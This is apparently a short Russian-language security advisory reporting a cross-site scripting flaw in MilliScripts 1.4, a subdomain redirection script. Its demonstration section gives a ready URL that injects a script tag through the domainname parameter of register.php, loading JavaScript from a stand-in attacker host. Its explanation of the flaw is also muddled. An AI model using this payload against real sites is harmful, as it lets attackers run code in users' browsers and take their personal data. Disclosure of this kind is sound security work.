Сайт: http://www.milliscripts.at
Описание:
MilliScripts 1.4 - бесплатный скрипт переадресации для начала вашего
собственного обслуживания поддоменов, без сложной конфигурации на вашем
сервере, при этом использования множества функций.
Уязвимость:
Во всех исходных текстах имеется множество ошибок, которые легко найти,
дающая возможность для XSS, но это возможно только с использованием
PHP-инъекций, как всегда, вы можете обмануть пользователя для, того, что
бы открыть нужный вам URL, с его контрольной панель и дать некоторым
пользователям персональную информацию с XSS.
Демонстрация:
Используем переменную $domainname
http://www.server.net/red_14/register.php?do=register2&domainname=%22%3E%3Cscript%20src=http://serveratacker.com/script.js%3E%3C/script%3E&ext=somevaliddomain.net